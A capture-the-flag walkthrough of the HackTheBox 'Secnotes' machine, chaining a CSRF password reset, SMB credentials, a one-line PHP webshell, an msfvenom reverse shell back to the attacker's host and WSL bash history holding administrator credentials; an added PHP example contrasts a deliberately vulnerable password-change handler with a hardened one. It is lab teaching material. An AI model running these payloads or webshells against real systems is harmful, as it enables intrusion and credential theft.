Secnotes
A medium Windows box from HackTheBox. Initial access comes from resetting another user's password through a CSRF vulnerability on the site, then logging in as that user to find creds that allow a reverse shell, and finally escalating to Administrator by finding creds in an instance of Bash for Windows.
Recon
Starting with a default nmap scan
sudo nmap -sC -sV -Pn -oA nmap/init 10.10.10.97
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-title: Secure Notes - Login
|_Requested resource was login.php
| http-methods:
|_ Potentially risky methods: TRACE
445/tcp open microsoft-ds Windows 10 Enterprise 17134 microsoft-ds (workgroup: HTB)
Service Info: Host: SECNOTES; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2022-09-25T16:50:24
|_ start_date: N/A
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled but not required
| smb-os-discovery:
| OS: Windows 10 Enterprise 17134 (Windows 10 Enterprise 6.3)
| OS CPE: cpe:/o:microsoft:windows_10::-
| Computer name: SECNOTES
| NetBIOS computer name: SECNOTES\x00
| Workgroup: HTB\x00
|_ System time: 2022-09-25T09:50:27-07:00
|_clock-skew: mean: 2h20m02s, deviation: 4h02m31s, median: 1s
Only two ports are open, so navigate to the site.
See a login page; no easy SQLi payloads work, so create an account and log in.
It seems to be a note-taking app.
The site reveals a user, “tyler”, and a domain, “secnotes.htb”, so add that domain to the /etc/hosts file.
Now try playing around with the site to see what we can find. There is an XSS when you create a note, but it doesn’t really seem useful since there’s no way to make someone navigate to it.
The focus on the contact form in the header makes me think that it could be a CSRF vulnerability, so try to test it out on the site with a simple payload of
http://10.10.14.9/
Start a netcat listener on port 80 and send the payload to see if it will pop
And it does
nc -lnvp 80
listening on [any] 80 ...
connect to [10.10.14.9] from (UNKNOWN) [10.10.10.97] 56002
GET / HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.228
Host: 10.10.14.9
Connection: Keep-Alive
Exploitation
Now we need to do something malicious with this knowledge; maybe we can reset the “tyler” user's password?
Notice that the reset password functionality doesn’t require the current password,
so it's a prime target.
Catching the request in Burp, see that it's a POST request; check whether the password can still be changed if it's sent as a GET request, for simplicity.
If it only works as a POST, we’ll have to include some JavaScript to submit the form.
To convert the request, send the captured password change request to Repeater, then right-click and select “Change HTTP method”, and Burp will convert the POST request to GET.
Sending the new GET request, it still resets the password.
In the end, the URL for the password reset request is
http://10.10.10.97/change_pass.php?password=password&confirm_password=password&submit=submit
Then send it through the contact form.
Wait a minute or two, then try to log in as tyler with password “password” and get in to read his notes.
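As an added example, not the box's real change_pass.php (which the writeup never shows), the following PHP models the endpoint as it must behave for the attack above to work, beside a hardened version that rejects the forged request in three separate ways. The $USERS array, the placeholder password, the function names and the CLI demo at the bottom are all constructed for the example.

```php
<?php
declare(strict_types=1);
// Added example, not code from the box: models the password-change endpoint
// the writeup abuses, beside a hardened version. $USERS, the placeholder
// password and the demo request at the bottom are constructed.

// SameSite=Lax cookies (PHP >= 7.3) are withheld on cross-site POSTs but
// still sent on a top-level GET navigation such as the link in the contact
// form, so the cookie flag alone does not close this hole.
session_set_cookie_params(['httponly' => true, 'samesite' => 'Lax']);
session_start();

// Constructed stand-in for the users table: username => password hash.
$USERS = ['tyler' => password_hash('original-password', PASSWORD_DEFAULT)];

function current_user(): string
{
    return $_SESSION['user'] ?? '';
}

// Vulnerable shape inferred from the writeup: honours GET as well as POST,
// carries no anti-CSRF token and never asks for the current password, so a
// link opened by a logged-in user silently replaces their password.
function change_pass_vulnerable(array &$users): bool
{
    $pw      = $_REQUEST['password'] ?? '';
    $confirm = $_REQUEST['confirm_password'] ?? '';
    if ($pw === '' || $pw !== $confirm || current_user() === '') {
        return false;
    }
    $users[current_user()] = password_hash($pw, PASSWORD_DEFAULT);
    return true;
}

// Per-session anti-CSRF token; a cross-site page cannot read it.
function csrf_token(): string
{
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// Hardened handler: returns the HTTP status it would send.
function change_pass_hardened(array &$users): int
{
    // State changes only over POST: the forged GET from the writeup gets 405.
    if (($_SERVER['REQUEST_METHOD'] ?? 'GET') !== 'POST') {
        return 405;
    }
    // Token from the form must match the session's, compared in constant time.
    if (!hash_equals(csrf_token(), (string) ($_POST['csrf_token'] ?? ''))) {
        return 403;
    }
    $user = current_user();
    if ($user === '' || !isset($users[$user])) {
        return 401;
    }
    // Re-authenticate: a forged request riding the victim's browser cannot
    // supply the current password.
    if (!password_verify((string) ($_POST['current_password'] ?? ''), $users[$user])) {
        return 403;
    }
    $pw = (string) ($_POST['password'] ?? '');
    if (strlen($pw) < 12 || $pw !== (string) ($_POST['confirm_password'] ?? '')) {
        return 400;
    }
    $users[$user] = password_hash($pw, PASSWORD_DEFAULT);
    session_regenerate_id(true); // rotate the session id after a credential change
    return 200;
}

// The form that posts to the hardened handler carries the token.
function change_pass_form(): string
{
    $token = htmlspecialchars(csrf_token(), ENT_QUOTES, 'UTF-8');
    return '<form method="post" action="change_pass.php">'
         . '<input type="hidden" name="csrf_token" value="' . $token . '">'
         . '<input type="password" name="current_password">'
         . '<input type="password" name="password">'
         . '<input type="password" name="confirm_password">'
         . '<button name="submit" value="submit">Change password</button>'
         . '</form>';
}

// Constructed CLI demonstration of the writeup's forged GET against both handlers.
if (PHP_SAPI === 'cli') {
    $_SESSION['user'] = 'tyler';                 // the victim is logged in
    $_SERVER['REQUEST_METHOD'] = 'GET';
    $_REQUEST = ['password' => 'password', 'confirm_password' => 'password'];
    var_dump(change_pass_vulnerable($USERS));
    var_dump(change_pass_hardened($USERS));
}
```

Run from the command line, the vulnerable handler returns true and tyler's hash is overwritten with the attacker's choice, while the hardened one returns 405 before touching the store. Changing the demo to a POST without the token gives 403, and a POST with the right token but the wrong current password still gives 403, which is the layer that matters most: even if a future bug leaked the token, the forged request cannot know the secret the victim holds in their head. SameSite=Strict would also stop the contact-form link, but it breaks legitimate inbound links to the site, so the method and token checks are the dependable fix.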
The note at the bottom contains what look like SMB creds, so connect to the share with smbclient:
tyler:92g!mA8BGjOirkL%OG*&
smbclient \\\\secnotes.htb\\new-site --user=tyler
Then log in with the password, but there's nothing too interesting, just the default contents of an IIS site:
smb: \> ls
. D 0 Sun Sep 25 14:50:33 2022
.. D 0 Sun Sep 25 14:50:33 2022
iisstart.htm A 696 Thu Jun 21 11:26:03 2018
iisstart.png A 98757 Thu Jun 21 11:26:03 2018
test.html A 74 Sun Sep 25 14:50:33 2022
7736063 blocks of size 4096. 3332421 blocks available
smb: \>
Navigating to /iisstart.htm on the secnotes site shows nothing, so maybe we are missing something:
sudo nmap -p- -T4 -v secnotes.htb
Find another open port, 8808
...
Discovered open port 8808/tcp on 10.10.10.97
...
Navigating to it in the browser, see an IIS homepage. To test whether it's the same directory we have in SMB, upload a test.txt file with the contents “test” to the share, then navigate to it at
http://10.10.10.97:8808/test.txt
And see it displayed on the site
Now try to get an ASP webshell going, but neither ASP nor ASPX works.
Instead try a PHP webshell, since maybe it's the same configuration as the secnotes.htb site:
<?php system($_GET['cmd']); ?>
Upload it as web.php, and try the URL
http://10.10.10.97:8808/rev.php?cmd=whoami
And see the output of whoami in the page source.
So now we have code execution and can simply upload an exe reverse shell and execute it with the webshell:
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.9 LPORT=9001 -f exe > rev.exe
Start a listener on 9001, and upload the rev.exe file using smbclient's put command.
Then navigate to
http://10.10.10.97:8808/webshell.php?cmd=rev.exe
And catch the reverse shell as tyler
C:\inetpub\new-site>whoami
secnotes\tyler
C:\inetpub\new-site>
On tyler's desktop, while grabbing the user.txt file, also find a bash.lnk file: a desktop shortcut to bash?
Directory of C:\Users\tyler\Desktop
09/25/2022 12:50 PM <DIR> .
09/25/2022 12:50 PM <DIR> ..
06/22/2018 03:09 AM 1,293 bash.lnk
08/02/2021 03:32 AM 1,210 Command Prompt.lnk
04/11/2018 04:34 PM 407 File Explorer.lnk
09/25/2022 12:50 PM <DIR> Microsoft
06/21/2018 05:50 PM 1,417 Microsoft Edge.lnk
06/21/2018 09:17 AM 1,110 Notepad++.lnk
09/25/2022 09:33 AM 34 user.txt
08/19/2018 10:59 AM 2,494 Windows PowerShell.lnk
7 File(s) 7,965 bytes
3 Dir(s) 13,628,198,912 bytes free
Seems like he installed Bash for Windows; try to execute it with
bash
The file isn’t found, so go looking for it with
C:\Users\tyler\Desktop>where /R c:\ bash.exe
where /R c:\ bash.exe
c:\Windows\WinSxS\amd64_microsoft-windows-lxss-bash_31bf3856ad364e35_10.0.17134.1_none_251beae725bc7de5\bash.exe
Execute it with
C:\Users\tyler\Desktop> c:\Windows\WinSxS\amd64_microsoft-windows-lxss-bash_31bf3856ad364e35_10.0.17134.1_none_251beae725bc7de5\bash.exe
And drop into a bash shell
whoami
root
However, when we try to access the C:\Users\Administrator folder, we don't have read access.
Instead, poke around the bash environment and find a .bash_history file:
cat .bash_history
cd /mnt/c/
ls
cd Users/
cd /
cd ~
ls
pwd
mkdir filesystem
mount //127.0.0.1/c$ filesystem/
sudo apt install cifs-utils
mount //127.0.0.1/c$ filesystem/
mount //127.0.0.1/c$ filesystem/ -o user=administrator
cat /proc/filesystems
sudo modprobe cifs
smbclient
apt install smbclient
smbclient
smbclient -U 'administrator%u6!4ZwgwOM#^OBf#Nwnh' \\\\127.0.0.1\\c$
> .bash_history
less .bash_history
And see some administrator creds!
Back on the Kali machine, connect using the creds found in the file, and get a connection as the Administrator user to extract root.txt.